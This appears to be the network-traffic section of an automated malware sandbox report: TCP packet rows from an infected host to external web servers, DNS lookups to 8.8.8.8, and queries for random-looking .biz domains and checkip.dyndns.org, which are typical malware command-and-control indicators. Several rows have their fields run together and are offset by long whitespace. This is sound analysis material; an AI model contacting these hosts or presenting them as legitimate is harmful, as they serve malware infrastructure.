Jan 15, 2025 12:58:55.036662102 CET | 80 | 49207 | 208.117.43.225 | 192.168.2.22
Jan 15, 2025 12:58:55.036706924 CET | 80 | 49207 | 208.117.43.225 | 192.168.2.22
Jan 15, 2025 12:58:55.145962954 CET | 80 | 49207 | 208.117.43.225 | 192.168.2.22
Jan 15, 2025 12:58:55.169821978 CET | 49209 | 80 | 192.168.2.22 | 13.251.16.150
Jan 15, 2025 12:58:55.175692081 CET | 80 | 49209 | 13.251.16.150 | 192.168.2.22
Jan 15, 2025 12:58:55.175751925 CET | 49209 | 80 | 192.168.2.22 | 13.251.16.150
Jan 15, 2025 12:58:55.175888062 CET | 49209 | 80 | 192.168.2.22 | 13.251.16.150
Jan 15, 2025 12:58:55.175928116 CET | 49209 | 80 | 192.168.2.22 | 13.251.16.150
Jan 15, 2025 12:58:55.181596994 CET | 80 | 49209 | 13.251.16.150 | 192.168.2.22
Jan 15, 2025 12:58:55.181627035 CET | 80 | 49209 | 13.251.16.150 | 192.168.2.22
Jan 15, 2025 12:58:55.356626987 CET | 80 | 49207 | 208.117.43.225 | 192.168.2.22
Jan 15, 2025 12:58:55.356687069 CET | 49207 | 80 | 192.168.2.22 | 208.117.43.225
Jan 15, 2025 12:58:55.969235897 CET | 80 | 49194 | 82.112.184.197 | 192.168.2.22
Jan 15, 2025 12:58:55.969485998 CET | 49194 | 80 | 192.168.2.22 | 82.112.184.197
Jan 15, 2025 12:58:55.969485998 CET | 49194 | 80 | 192.168.2.22 | 82.112.184.197
Jan 15, 2025 12:58:55.970067978 CET | 49210 | 80 | 192.168.2.22 | 82.112.184.197
Jan 15, 2025 12:58:55.974946976 CET | 80 | 49194 | 82.112.184.197 | 192.168.2.22
Jan 15, 2025 12:58:55.975310087 CET | 80 | 49210 | 82.112.184.197 | 192.168.2.22
Jan 15, 2025 12:58:55.975594997 CET | 49210 | 80 | 192.168.2.22 | 82.112.184.197
Jan 15, 2025 12:58:55.975646019 CET | 49210 | 80 | 192.168.2.22 | 82.112.184.197
Jan 15, 2025 12:58:55.975646019 CET | 49210 | 80 | 192.168.2.22 | 82.112.184.197
Jan 15, 2025 12:58:55.980701923 CET | 80 | 49210 | 82.112.184.197 | 192.168.2.22
Jan 15, 2025 12:58:55.980731964 CET | 80 | 49210 | 82.112.184.197 | 192.168.2.22
Jan 15, 2025 12:58:56.542937040 CET | 80 | 49209 | 13.251.16.150 | 192.168.2.22
Jan 15, 2025 12:58:56.543088913 CET | 80 | 49209 | 13.251.16.150 | 192.168.2.22
Jan 15, 2025 12:58:56.546209097 CET | 49209 | 80 | 192.168.2.22 | 13.251.16.150
Jan 15, 2025 12:58:56.546210051 CET | 49209 | 80 | 192.168.2.22 | 13.251.16.150
Jan 15, 2025 12:58:56.551359892 CET | 80 | 49209 | 13.251.16.150 | 192.168.2.22
Jan 15, 2025 12:58:56.833452940 CET | 49211 | 80 | 192.168.2.22 | 44.221.84.105
Jan 15, 2025 12:58:56.838567019 CET | 80 | 49211 | 44.221.84.105 | 192.168.2.22
Jan 15, 2025 12:58:56.838639021 CET | 49211 | 80 | 192.168.2.22 | 44.221.84.105
Jan 15, 2025 12:58:56.838746071 CET | 49211 | 80 | 192.168.2.22 | 44.221.84.105
Jan 15, 2025 12:58:56.838781118 CET | 49211 | 80 | 192.168.2.22 | 44.221.84.105
Jan 15, 2025 12:58:56.843575001 CET | 80 | 49211 | 44.221.84.105 | 192.168.2.22
Jan 15, 2025 12:58:56.844141960 CET | 80 | 49211 | 44.221.84.105 | 192.168.2.22
Jan 15, 2025 12:58:57.376599073 CET | 80 | 49211 | 44.221.84.105 | 192.168.2.22
Jan 15, 2025 12:58:57.376770973 CET | 49211 | 80 | 192.168.2.22 | 44.221.84.105
Jan 15, 2025 12:58:57.376908064 CET | 80 | 49211 | 44.221.84.105 | 192.168.2.22
Jan 15, 2025 12:58:57.376970053 CET | 49211 | 80 | 192.168.2.22 | 44.221.84.105
Jan 15, 2025 12:58:57.381977081 CET | 80 | 49211 | 44.221.84.105 | 192.168.2.22
Jan 15, 2025 12:58:57.591125965 CET | 49212 | 80 | 192.168.2.22 | 54.244.188.177
Jan 15, 2025 12:58:57.596103907 CET | 80 | 49212 | 54.244.188.177 | 192.168.2.22
Jan 15, 2025 12:58:57.596172094 CET | 49212 | 80 | 192.168.2.22 | 54.244.188.177
Jan 15, 2025 12:58:57.598474026 CET | 49212 | 80 | 192.168.2.22 | 54.244.188.177
Jan 15, 2025 12:58:57.598474026 CET | 49212 | 80 | 192.168.2.22 | 54.244.188.177
Jan 15, 2025 12:58:57.603344917 CET | 80 | 49212 | 54.244.188.177 | 192.168.2.22
Jan 15, 2025 12:58:57.603425026 CET | 80 | 49212 | 54.244.188.177 | 192.168.2.22
Jan 15, 2025 12:58:58.308698893 CET | 80 | 49212 | 54.244.188.177 | 192.168.2.22
Jan 15, 2025 12:58:58.308801889 CET | 80 | 49212 | 54.244.188.177 | 192.168.2.22
Jan 15, 2025 12:58:58.308900118 CET | 49212 | 80 | 192.168.2.22 | 54.244.188.177
Jan 15, 2025 12:58:58.308900118 CET | 49212 | 80 | 192.168.2.22 | 54.244.188.177
Jan 15, 2025 12:58:58.313899994 CET | 80 | 49212 | 54.244.188.177 | 192.168.2.22
Jan 15, 2025 12:58:58.325198889 CET | 49213 | 80 | 192.168.2.22 | 35.164.78.200
Jan 15, 2025 12:58:58.330200911 CET | 80 | 49213 | 35.164.78.200 | 192.168.2.22
Jan 15, 2025 12:58:58.330265999 CET | 49213 | 80 | 192.168.2.22 | 35.164.78.200
Jan 15, 2025 12:58:58.330640078 CET | 49213 | 80 | 192.168.2.22 | 35.164.78.200
Jan 15, 2025 12:58:58.330674887 CET | 49213 | 80 | 192.168.2.22 | 35.164.78.200
Jan 15, 2025 12:58:58.335514069 CET | 80 | 49213 | 35.164.78.200 | 192.168.2.22
Jan 15, 2025 12:58:58.335545063 CET | 80 | 49213 | 35.164.78.200 | 192.168.2.22
Jan 15, 2025 12:58:59.220516920 CET | 80 | 49213 | 35.164.78.200 | 192.168.2.22
Jan 15, 2025 12:58:59.220562935 CET | 80 | 49213 | 35.164.78.200 | 192.168.2.22
Jan 15, 2025 12:58:59.220591068 CET | 80 | 49213 | 35.164.78.200 | 192.168.2.22
Jan 15, 2025 12:58:59.220756054 CET | 49213 | 80 | 192.168.2.22 | 35.164.78.200
Jan 15, 2025 12:58:59.220835924 CET | 49213 | 80 | 192.168.2.22 | 35.164.78.200
Jan 15, 2025 12:58:59.225917101 CET | 80 | 49213 | 35.164.78.200 | 192.168.2.22
Jan 15, 2025 12:58:59.249690056 CET | 49214 | 80 | 192.168.2.22 | 3.94.10.34
Jan 15, 2025 12:58:59.255296946 CET | 80 | 49214 | 3.94.10.34 | 192.168.2.22
Jan 15, 2025 12:58:59.258728027 CET | 49214 | 80 | 192.168.2.22 | 3.94.10.34
Jan 15, 2025 12:58:59.258728027 CET | 49214 | 80 | 192.168.2.22 | 3.94.10.34
Jan 15, 2025 12:58:59.258728027 CET | 49214 | 80 | 192.168.2.22 | 3.94.10.34
Jan 15, 2025 12:58:59.264010906 CET | 80 | 49214 | 3.94.10.34 | 192.168.2.22
Jan 15, 2025 12:58:59.264048100 CET | 80 | 49214 | 3.94.10.34 | 192.168.2.22
Jan 15, 2025 12:58:59.714334965 CET | 80 | 49214 | 3.94.10.34 | 192.168.2.22
Jan 15, 2025 12:58:59.714380026 CET | 80 | 49214 | 3.94.10.34 | 192.168.2.22
Jan 15, 2025 12:58:59.714440107 CET | 49214 | 80 | 192.168.2.22 | 3.94.10.34
Jan 15, 2025 12:58:59.714518070 CET | 49214 | 80 | 192.168.2.22 | 3.94.10.34
Jan 15, 2025 12:58:59.720207930 CET | 80 | 49214 | 3.94.10.34 | 192.168.2.22
Jan 15, 2025 12:58:59.736241102 CET | 49215 | 80 | 192.168.2.22 | 165.160.13.20
Jan 15, 2025 12:58:59.741492033 CET | 80 | 49215 | 165.160.13.20 | 192.168.2.22
Jan 15, 2025 12:58:59.741548061 CET | 49215 | 80 | 192.168.2.22 | 165.160.13.20
Jan 15, 2025 12:58:59.741719961 CET | 49215 | 80 | 192.168.2.22 | 165.160.13.20
Jan 15, 2025 12:58:59.741744995 CET | 49215 | 80 | 192.168.2.22 | 165.160.13.20
Jan 15, 2025 12:58:59.746582985 CET | 80 | 49215 | 165.160.13.20 | 192.168.2.22
Jan 15, 2025 12:58:59.746613026 CET | 80 | 49215 | 165.160.13.20 | 192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.419083118 CET8049215165.160.13.20192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.514822006 CET4921580192.168.2.22165.160.13.20
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.514852047 CET4921580192.168.2.22165.160.13.20
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.516406059 CET4919080192.168.2.2272.52.178.23
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.516406059 CET4919180192.168.2.22199.59.243.228
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.516470909 CET4919280192.168.2.2213.248.148.254
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.520037889 CET8049215165.160.13.20192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.520082951 CET8049215165.160.13.20192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.725339890 CET8049215165.160.13.20192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.770044088 CET4921680192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.774924994 CET804921654.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.774997950 CET4921680192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.775101900 CET4921680192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.775135994 CET4921680192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.780014038 CET804921654.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.780042887 CET804921654.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.948759079 CET8049215165.160.13.20192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.948827028 CET4921580192.168.2.22165.160.13.20
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.508352995 CET804921654.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.508397102 CET804921654.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.510054111 CET4921680192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.519572973 CET4921680192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.524535894 CET804921654.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.701519966 CET4920780192.168.2.22208.117.43.225
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.701549053 CET4920780192.168.2.22208.117.43.225
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.706768990 CET8049207208.117.43.225192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.706805944 CET8049207208.117.43.225192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.815042019 CET8049207208.117.43.225192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.865535975 CET4920780192.168.2.22208.117.43.225
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.865595102 CET4920780192.168.2.22208.117.43.225
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.870610952 CET8049207208.117.43.225192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.870647907 CET8049207208.117.43.225192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.040879965 CET8049207208.117.43.225192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.058320045 CET4921780192.168.2.2218.246.231.120
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.063638926 CET804921718.246.231.120192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.063700914 CET4921780192.168.2.2218.246.231.120
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.063853979 CET4921780192.168.2.2218.246.231.120
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.063890934 CET4921780192.168.2.2218.246.231.120
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.068815947 CET804921718.246.231.120192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.068845987 CET804921718.246.231.120192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.247208118 CET4920780192.168.2.22208.117.43.225
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.782277107 CET804921718.246.231.120192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.782322884 CET804921718.246.231.120192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.782416105 CET4921780192.168.2.2218.246.231.120
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.782512903 CET4921780192.168.2.2218.246.231.120
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.787885904 CET804921718.246.231.120192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.799196005 CET4921880192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.804574966 CET804921854.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.804807901 CET4921880192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.804809093 CET4921880192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.804934978 CET4921880192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.810530901 CET804921854.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.810575962 CET804921854.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:03.064913034 CET8049202199.59.243.228192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:03.064984083 CET4920280192.168.2.22199.59.243.228
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:03.065012932 CET4920280192.168.2.22199.59.243.228
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:03.070122957 CET8049202199.59.243.228192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 15, 2025 12:57:07.339159966 CET | 54562 | 53 | 192.168.2.22 | 8.8.8.8
Jan 15, 2025 12:57:07.345727921 CET | 53 | 54562 | 8.8.8.8 | 192.168.2.22
Jan 15, 2025 12:57:07.584372997 CET | 52917 | 53 | 192.168.2.22 | 8.8.8.8
Jan 15, 2025 12:57:07.591567039 CET | 53 | 52917 | 8.8.8.8 | 192.168.2.22
Jan 15, 2025 12:57:08.809870005 CET | 62751 | 53 | 192.168.2.22 | 8.8.8.8
Jan 15, 2025 12:57:08.816653967 CET | 53 | 62751 | 8.8.8.8 | 192.168.2.22
Jan 15, 2025 12:57:09.169909000 CET | 57893 | 53 | 192.168.2.22 | 8.8.8.8
Jan 15, 2025 12:57:09.176743031 CET | 53 | 57893 | 8.8.8.8 | 192.168.2.22
Jan 15, 2025 12:57:09.208528996 CET | 54821 | 53 | 192.168.2.22 | 8.8.8.8
Jan 15, 2025 12:57:09.215403080 CET | 53 | 54821 | 8.8.8.8 | 192.168.2.22
Jan 15, 2025 12:57:10.700023890 CET | 54719 | 53 | 192.168.2.22 | 8.8.8.8
Jan 15, 2025 12:57:10.706717968 CET | 53 | 54719 | 8.8.8.8 | 192.168.2.22
Jan 15, 2025 12:57:11.051700115 CET | 49881 | 53 | 192.168.2.22 | 8.8.8.8
Jan 15, 2025 12:57:11.061639071 CET | 53 | 49881 | 8.8.8.8 | 192.168.2.22
Jan 15, 2025 12:57:11.896883965 CET | 54998 | 53 | 192.168.2.22 | 8.8.8.8
Jan 15, 2025 12:57:11.904395103 CET | 53 | 54998 | 8.8.8.8 | 192.168.2.22
Jan 15, 2025 12:57:12.878703117 CET | 52781 | 53 | 192.168.2.22 | 8.8.8.8
Jan 15, 2025 12:57:12.885632038 CET | 53 | 52781 | 8.8.8.8 | 192.168.2.22
Jan 15, 2025 12:57:13.607247114 CET | 63926 | 53 | 192.168.2.22 | 8.8.8.8
Jan 15, 2025 12:57:13.613821030 CET | 53 | 63926 | 8.8.8.8 | 192.168.2.22
Jan 15, 2025 12:57:14.148497105 CET | 65510 | 53 | 192.168.2.22 | 8.8.8.8
Jan 15, 2025 12:57:14.155237913 CET | 53 | 65510 | 8.8.8.8 | 192.168.2.22
Jan 15, 2025 12:57:15.951770067 CET | 62672 | 53 | 192.168.2.22 | 8.8.8.8
Jan 15, 2025 12:57:15.958900928 CET | 53 | 62672 | 8.8.8.8 | 192.168.2.22
Jan 15, 2025 12:57:15.987935066 CET | 56475 | 53 | 192.168.2.22 | 8.8.8.8
Jan 15, 2025 12:57:15.996045113 CET | 53 | 56475 | 8.8.8.8 | 192.168.2.22
Jan 15, 2025 12:57:18.793936014 CET | 49384 | 53 | 192.168.2.22 | 8.8.8.8
Jan 15, 2025 12:57:18.801728010 CET | 53 | 49384 | 8.8.8.8 | 192.168.2.22
Jan 15, 2025 12:57:18.807354927 CET | 54842 | 53 | 192.168.2.22 | 8.8.8.8
Jan 15, 2025 12:57:18.813716888 CET | 53 | 54842 | 8.8.8.8 | 192.168.2.22
Jan 15, 2025 12:57:18.887154102 CET | 58105 | 53 | 192.168.2.22 | 8.8.8.8
Jan 15, 2025 12:57:18.894185066 CET | 53 | 58105 | 8.8.8.8 | 192.168.2.22
Jan 15, 2025 12:57:42.575397015 CET | 64928 | 53 | 192.168.2.22 | 8.8.8.8
Jan 15, 2025 12:57:42.582453012 CET | 53 | 64928 | 8.8.8.8 | 192.168.2.22
Jan 15, 2025 12:57:44.412434101 CET | 57390 | 53 | 192.168.2.22 | 8.8.8.8
Jan 15, 2025 12:57:44.419126987 CET | 53 | 57390 | 8.8.8.8 | 192.168.2.22
Jan 15, 2025 12:57:45.944802046 CET | 58095 | 53 | 192.168.2.22 | 8.8.8.8
Jan 15, 2025 12:57:45.951411009 CET | 53 | 58095 | 8.8.8.8 | 192.168.2.22
Jan 15, 2025 12:57:46.733863115 CET | 54261 | 53 | 192.168.2.22 | 8.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:46.740870953 CET53542618.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:47.254509926 CET6050753192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:47.261042118 CET53605078.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:48.115329027 CET5044653192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:48.121848106 CET53504468.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:48.246627092 CET5593953192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:48.253349066 CET53559398.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.263942003 CET4960853192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.273724079 CET53496088.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.293911934 CET6148653192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:49.301213026 CET53614868.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:50.104069948 CET6245353192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:50.110743046 CET53624538.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:50.144217968 CET5056853192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:50.152160883 CET53505688.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:51.627363920 CET6146753192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:51.634495974 CET53614678.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:51.635587931 CET6161853192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:51.642644882 CET53616188.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:51.645697117 CET5442253192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:51.652574062 CET53544228.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:01.741924047 CET5207453192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:01.748874903 CET53520748.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:16.624852896 CET5033753192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:16.632355928 CET53503378.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:18.184039116 CET6182653192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:18.190633059 CET53618268.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:19.741847038 CET5632953192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:19.748874903 CET53563298.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:20.559298038 CET6346953192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:20.566715956 CET53634698.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.044343948 CET5944753192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.050683975 CET53594478.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.815673113 CET5182853192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.822382927 CET53518288.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.976964951 CET5340653192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:21.984603882 CET53534068.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:22.623039961 CET5634553192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:22.629940987 CET53563458.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:22.645802975 CET5187053192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:22.652829885 CET53518708.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:34.584275007 CET6500953192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:34.591279984 CET53650098.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:45.254847050 CET6495653192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:45.262031078 CET53649568.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:46.814760923 CET5452153192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:46.821993113 CET53545218.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:48.301343918 CET4975053192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:48.308505058 CET53497508.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:48.804488897 CET6468753192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:48.810899019 CET53646878.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.227767944 CET6508453192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.235430956 CET53650848.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.925652027 CET6337353192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.934954882 CET53633738.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.937546015 CET5620753192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:50.945674896 CET53562078.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:52.394711971 CET5101453192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:52.401743889 CET53510148.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:52.569201946 CET4969053192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:52.575774908 CET53496908.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:53.201472044 CET4994953192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:53.208211899 CET53499498.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:54.019469976 CET5825753192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:54.026063919 CET53582578.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:54.524389029 CET5473853192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:54.532082081 CET53547388.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:55.160516977 CET6159853192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:55.169028997 CET53615988.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:56.637732983 CET5875453192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:56.831235886 CET53587548.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:57.583293915 CET4922653192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:57.590039015 CET53492268.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:58.317264080 CET5469553192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:58.324563026 CET53546958.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:59.241157055 CET6160153192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:59.248411894 CET53616018.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:59.726906061 CET5461553192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:58:59.734153986 CET53546158.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.761492968 CET5495053192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:00.769293070 CET53549508.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.693620920 CET6421553192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:01.700954914 CET53642158.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.050468922 CET5960453192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.057585955 CET53596048.8.8.8192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.790848017 CET4952053192.168.2.228.8.8.8
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:59:02.798438072 CET53495208.8.8.8192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 15, 2025 12:57:07.339159966 CET | 192.168.2.22 | 8.8.8.8 | 0x25c | Standard query (0) | pywolwnvd.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:07.584372997 CET | 192.168.2.22 | 8.8.8.8 | 0xfd20 | Standard query (0) | pywolwnvd.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:08.809870005 CET | 192.168.2.22 | 8.8.8.8 | 0x4787 | Standard query (0) | ssbzmoy.biz | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:09.169909000 CET | 192.168.2.22 | 8.8.8.8 | 0xc7f5 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:09.208528996 CET | 192.168.2.22 | 8.8.8.8 | 0x19f3 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jan 15, 2025 12:57:10.700023890 CET | 192.168.2.22 | 8.8.8.8 | 0x74ff | Standard query (0) | cvgrf.biz | A (IP address) | IN (0x0001) | false
